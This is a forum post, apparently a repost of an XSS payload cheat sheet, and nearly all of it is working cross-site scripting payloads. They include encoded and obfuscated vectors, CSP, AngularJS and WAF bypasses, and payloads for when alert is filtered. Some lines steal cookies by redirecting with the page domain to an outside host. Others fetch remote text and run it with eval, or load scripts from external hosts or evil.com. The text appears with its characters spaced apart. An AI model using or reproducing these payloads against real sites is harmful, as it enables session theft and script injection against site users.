搜索

[20510] 2021-02-09_奇技淫巧(全)-XSSpayload

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-02-09_奇技淫巧(全)-XSSpayload ( )   -   X S S   p a y l o a d d u b e y - a m i t   K h a n   2 0 2 1 - 0 2 - 0 9 B l i n d   X S S E n c o d i n g X M L   B a s e d   X S S W h e r e   : / /   i s   r e q u i r e d   a f t e r   p r o t o c o l X S S   i n   e m a i l   I D a l e r t ,   p r o m p t ,   c o n f i r m   i s   n o t   a l l o w e d S i m p l e   b y p a s s e s O b f u s c a t e d   v e c t o r s h t t p s : / / x s s h u n t e r . c o m / % u 0 0 3 C s c r i p t % u 0 0 3 E p r o m p t % u 0 0 2 8 3 0 3 % u 0 0 2 9 % u 0 0 3 C / s c r i p t % u 0 0 3 E % 2 5 3 C s c r i p t % 2 5 3 E a l e r t ( 1 ) % 2 5 3 C % 2 5 2 F s c r i p t % 2 5 3 E % u f f 1 c s c r i p t % u f f 1 e a l e r t ( 1 ) ; % u f f 1 c / s c r i p t % u f f 1 e < ! [ C D A T A [ < ] ] > s c r i p t < ! [ C D A T A [ > ] ] > a l e r t ( ' x s s ' ) < ! [ C D A T A [ < ] ] > / s c r i p t < ! [ C D A T A [ > ] ] > < x : s c r i p t   x m l n s : x = " h t t p : / / w w w . w 3 . o r g / 1 9 9 9 / x h t m l " > a l e r t ( 1 ) < / x : s c r i p t > j a v a s c r i p t : / / % 2 5 0 a a l e r t ( 1 ) " " > < s > t e s t " @ g m a i l . c o m t h i s [ O b j e c t [ " k e y s " ] ( t h i s ) [ 6 ] ] ( 1 ) j a v a s c r i p t : e v a l ( a t o b ( ' Y W x l c n Q o Z G 9 j d W 1 l b n Q u Y 2 9 v a 2 l l K T s = ' ) ) ; < s c r i p t > e v a l ( a t o b ( ' Y W x l c n Q o Z G 9 j d W 1 l b n Q u Y 2 9 v a 2 l l K T s = ' ) ) ; < / s c r i p t > < s v g / o n l o a d = t = / a l e r / . s o u r c e + / t / . s o u r c e ; w i n d o w . o n e r r o r / = w i n d o w [ t ] ; t h r o w + 1 ; / / [ ] [ ` f i l t e r ` ] [ ` c o n s t r u c t o r ` ] ( ` a l e ` . c o n c a t ( ` r t x 2 8 ` . c o n c a t ` 0 x 2 9 ` ) ) ( ) ; / / [ ] [ ' 1 4 6 1 5 1 1 5 4 1 6 4 1 4 5 1 6 2 ' ] [ ' 1 4 3 1 5 7 1 5 6 1 6 3 1 6 4 1 6 2 1 6 5 1 4 3 1 6 4 1 5 7 1 6 2 ' ] ( ' 1 4 1 1 5 4 1 4 5 1 6 2 1 6 4 5 0 6 1 5 1 ' ) ( ) ( [ _ , _ _ _ _ _ , _ , _ , _ _ , _ _ _ ] = ( _ _ = [ ] ) + { _ _ _ : _ _ } , [ _ _ _ _ _ _ , _ , _ _ _ _ _ _ _ _ , _ _ _ _ , , _ _ _ _ _ _ _ _ _ , _ _ _ _ _ _ _ , _ _ , , , _ _ _ _ _ _ _ _ _ _ ] = [ ! ! _ _ _ _ _ ] + ! _ _ _ _ _ + _ _ _ _ _ . _ _ _ _ _ ) [ _ _ _ + = _ _ _ _ _ + _ _ _ _ _ _ _ _ _ _ + _ _ + _ _ _ _ _ _ + _ + _ _ _ _ _ _ _ _ + _ _ _ + _ _ _ _ _ _ + _ _ _ _ _ + _ ] [ _ _ _ ] ( _ _ _ _ _ _ _ _ _ + _ _ _ _ _ _ _ + _ _ _ _ + _ + _ _ _ _ _ _ + ( [ , ? , , , , ? ? ] = [ ] + { } , [ ? ? ? , ? ? ? ? , ? ? ? ? ? , ? ? ? ? ? ? , , ? ? ? ? ? ? ? , ? ? ? ? ? ? ? ? , ? ? ? ? ? ? ? ? ? , , , ? ? ? ? ? ? ? ? ? ? ] = [ ! ! ? ] + ! ? + ? . ? ) [ ? ? + = ? + ? ? ? ? ? ? ? ? ? ? + ? ? ? ? ? ? ? ? ? + ? ? ? + ? ? ? ? + ? ? ? ? ? + ? ? + ? ? ? + ? + ? ? ? ? ] [ ? ? ] ( ? ? ? ? ? ? ? + ? ? ? ? ? ? ? ? + ? ? ? ? ? ? + ? ? ? ? + ? ? ? + < b o d y   o n p a g e s h o w = a l e r t ( 1 ) > < k   o n s u b m i t = a l e r t ( 1 ) > < k   o n i n p u t = a l e r t ( 1 ) > < s t y l e   o n l o a d = a l e r t ( 1 ) > < h t m l   o n t o u c h s t a r t = a l e r t ( 1 ) > M o b i l e X S S < m a r q u e e   b e h a v i o r = " a l t e r n a t e "   o n s t a r t = a l e r t ( 1 ) > X S S < / m a r q u e e > < s c r i p t / x > a l e r t ( 1 ) < / s c r i p t / x > < d e t a i l s   o n t o g g l e = a l e r t ( ) > < S C R I P T   S R C = / / B R U T E L O G I C . C O M . B R / 1 > < / S C R I P T > < S V G   O N L O A D = & # 9 7 & # 1 0 8 & # 1 0 1 & # 1 1 4 & # 1 1 6 ( 1 ) > < a / h r e f = / / 0 > < s c r i p t   s r c = / / 1 4 . r s > < b a s e   h r e f = / / e v i l . c o m > "   o n f o c u s = a l e r t ( 1 )   a u t o f o c u s < i m G / s R c = l   o N e r r O r = ( p r o m p t ) ( )   x > < d 3 " < " / o n c l i c k = " 1 > [ c o n f i r m ` ` ] " < " > X S S < s v g / x = " > " / o n l o a d = c o n f i r m ( ) / /
E x p l o i t   C o d e s J a v a s c r i p t   X S S C S P   B y p a s s e d A n g u l a r   J S W h e n   S p a c e   a n d   S l a s h   d o e s n t   w o r k M i s c < s v g / x = " > " / o n l o a d = c o n f i r m ( ) / / < ! ' / * " / * / ' / * / " / * - - > < / S c r i p t > < I m a g e   S r c S e t = K   * / ;   O n E r r o r = c o n f i r m ` 1 `   / / > < s v g   < / o n l o a d   = " 1 >   ( _ = p r o m p t , _ ( 1 ) )   " " > < w = " / x = " y > " / o n d b l c l i c k = ` < ` [ c o n f i r u 0 0 6 d ` ` ] > X X S < A / i D = x   h R E f = j a v & # x 0 9 ; a s c r i p t : p r o m & # x 0 9 ; p t ( d o c & # x 0 9 ; u m e n t . c o o & # x 0 9 ; k i e ) ;   i d = x > X S S < s c r i p t > v a r   x s s   =   ' ' ; f = d o c u m e n t . f o r m s ; f o r ( i = 0 ; i < f . l e n g t h ; i + + ) { e = f [ i ] . e l e m e n t s ; f o r ( n   i n   e ) { i f ( e [ n ] . t y p e = = ' h i d d e n ' ) { a l e r t ( e [ n ] . n a m e + ' :   ' + e [ n ] . v a l u e ) } } } ; / / ' ' ; < / s c r i p t > R e s p o n s e   o n   s e r v e r   ~ < s c r i p t > f u n c t i o n   b ( ) { e v a l ( t h i s . r e s p o n s e T e x t ) } ; a = n e w   X M L H t t p R e q u e s t ( ) ; a . a d d E v e n t L i s t e n e r ( " l o a d " ,   b ) ; a . o p e n ( " G E T " ,   " / / 1 2 7 . 0 . 0 . 1 : 8 0 8 0 " ) ; a . s e n d ( ) ; < / s c r i p t > C o o k i e   s t e a l i n g   w i t h   J S   p r o t o c o l   ~ j a v a s c r i p t : v o i d ( a = ' / / 1 2 7 . 0 . 0 . 1 ' ) ; v o i d ( b = d o c u m e n t . d o m a i n ) ; v o i d ( c = a . c o n c a t ( b ) ) ; v o i d ( w i n d o w . l o c a t i o n . a s s i g n ( c ) ) ; d a t a : , a l e r t ( 1 ) ' - a l e r t ( 1 ) / / ' } a l e r t ( 1 ) ; { ' ' - a l e r t ( ) - ' ' } a l e r t ( 1 ) % 0 A { ' ' } a l e r t ( 1 ) ; { / / < s c r i p t   s r c = / / a j a x . g o o g l e a p i s . c o m / a j a x / s e r v i c e s / f e e d / f i n d ? v = 1 . 0 % 2 6 c a l l b a c k = a l e r t % 2 6 c o n t e x t = 1 > < / s c r i p t >   < e m b e d   s r c = ' / / a j a x . g o o g l e a p i s . c o m / a j a x / l i b s / y u i / 2 . 8 . 0 r 4 / b u i l d / c h a r t s / a s s e t s / c h a r t s . s w f ? a l l o w e d D o m a i n = " } ) ) ) } c a t c h ( e ) { a l e r t ( 1 ) } / / ' { { c o n s t r u c t o r . c o n s t r u c t o r ( ' a l e r t ( 1 ) ' ) ( ) } } < x   n g - a p p > { { c o n s t r u c t o r . c o n s t r u c t o r ( ' a l e r t ( 1 ) ' ) ( ) } } < s v g o n l o a d = a l e r t ( 1 ) > < s c r i p t   ~ ~ ~ > c o n f i r m ( 1 ) < / s c r i p t   ~ ~ ~ > w i n d o w + = v a l u e O f = a l e r t ( 1 ) [ c o o k i e ] . s o m e ( a l e r t ) " a c c e s s k e y = X   o n c l i c k = a l e r t ( 1 ) + - a l e r t ( 1 ) / /   ( q u o t e l e s s   x s s   i n s i d e   j s   c o n t e x t   w h e n   p a r a m   i s   r e f l e c t i n g   2   t i m e s   i n   s a m e   l i n e ) < s v g   o n l o a d = s e t I n t e r v a l ` a l e r t x 2 8 d o c u m e n t . d o m a i n x 2 9 ` > ( a l e r t ) ( 1 ) a = a l e r t , a ( 1 ) [ 1 ] . f i n d ( a l e r t ) t o p [ " a l " + " e r t " ] ( 1 ) t o p [ / a l / . s o u r c e + / e r t / . s o u r c e ] ( 1 ) a l u 0 0 6 5 r t ( 1 ) t o p [ ' a l 1 4 5 r t ' ] ( 1 ) t o p [ 8 6 8 0 4 3 9 . . t o S t r i n g ( 3 0 ) ] ( 1 ) < s v g   o n l o a d = a l e r t & l p a r ; 1 & r p a r ; > < s v g   o n l o a d = a l e r t & # x 2 8 ; 1 & # x 2 9 > < s v g   o n l o a d = a l e r t & # 4 0 ; 1 & # 4 1 > < s v g   o n l o a d = s e t I n t e r v a l ` a l e r t x 2 8 d o c u m e n t . d o m a i n x 2 9 ` > " > < i n p u t   t y p e = " s u b m i t "   f o r m a c t i o n = " j a v a s c r i p t & c o l o n ; t h i s & l s q b ; ' a ' & p l u s ; ' l e r t ' & r s q b ; ` 1 ` " > < b o d y   o n f o c u s = a l e r t ( 1 ) > < o b j e c t   d a t a = j a v a s c r i p t : a l e r t ( 1 ) > < M E T A   H T T P - E Q U I V = " r e f r e s h "   C O N T E N T = " 0 ; u r l = d a t a : t e x t / h t m l ; b a s e 6 4 , P H N j c m l w d D 5 h b G V y d C g n W F N T J y k 8 L 3 N j c m l w d D 4 K " > < E M B E D   S R C = " d a t a : i m a g e / s v g + x m l ; b a s e 6 4 , P H N 2 Z y B 4 b W x u c z p z d m c 9 I m h 0 d H   A 6 L y 9 3 d 3 c u d z M u b 3 J n L z I w M D A v c 3 Z n I i B 4 b W x u c z 0 i a H R 0 c D o v L 3 d 3 d y 5 3 M y 5 v c m c v   M j A w M C 9 z d m c i I H h t b G 5 z O n h s a W 5 r P S J o d H R w O i 8 v d 3 d 3 L n c z L m 9 y Z y 8 x O T k 5 L 3 h s   a W 5 r I i B 2 Z X J z a W 9 u P S I x L j A i I H g 9 I j A i I H k 9 I j A i I H d p Z H R o P S I x O T Q i I G h l a W d o d D 0 i M j A w   I i B p Z D 0 i e H N z I j 4 8 c 2 N y a X B 0 I H R 5 c G U 9 I n R l e H Q v Z W N t Y X N j c m l w d C I + Y W x l c n Q o I l h   T U y I p O z w v c 2 N y a X B 0 P j w v c 3 Z n P g = = < I F R A M E   S R C = " j a v a s c r i p t : a l e r t ( ' X S S ' ) ; " > < / I F R A M E > % 2 5 3 c s c r i p t % 2 5 3 e a l e r t ( d o c u m e n t . c o o k i e ) % 2 5 3 c / s c r i p t % 2 5 3 e < a u d i o / o n l o a d s t a r t = a l e r t ( 1 )   s r c > % u 0 0 2 5 % u 0 0 7 5 % u 0 0 6 6 % u 0 0 6 6 % u 0 0 3 1 % u 0 0 6 3 % u 0 0 7 3 % u 0 0 6 3 % u 0 0 7 2 % u 0 0 6 9 % u 0 0 7 0 % u 0 0 7 4 % u 0 0 2 5 % u 0 0 7 5 % u 0 0 6 6 % u 0 0 6 6 % u 0 0 3 1 % u 0 0 6 5 % u 0 0 6 1 % u 0 0 6 c % u 0 0 6 5 % u 0 0 7 2 % u 0 0 7 4 % u 0 0 2 8 % u 0 0 1 8 % u 0 0 5 8 % u 0 0 5 3 % u 0 0 5 3 % u 0 0 1 9 % u 0 0 2 9 % u 0 0 3 b % u 0 0 2 5 % u 0 0 7 5 % u 0 0 6 6 % u 0 0 6 6 % u 0 0 3 1 % u 0 0 6 3 % u 0 0 2 f % u 0 0 7 3 % u 0 0 6 3 % u 0 0 7 2 % u 0 0 6 9 % u 0 0 7 0 % u 0 0 7 4 % u 0 0 2 5 % u 0 0 7 5 % u 0 0 6 6 % u 0 0 6 6 % u 0 0 3 1 % u 0 0 6 5 % u f f 1 c s c r i p t % u f f 1 e a l e r t ( 1 ) ; % u f f 1 c / s c r i p t % u f f 1 e < d E T A I L S % 0 a o p e n % 0 a o n T o G g l e % 0 a = % 0 a a = p r o m p t , a ( )   x >   a k a m a i   g h o s t   w a f b y p a s s
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理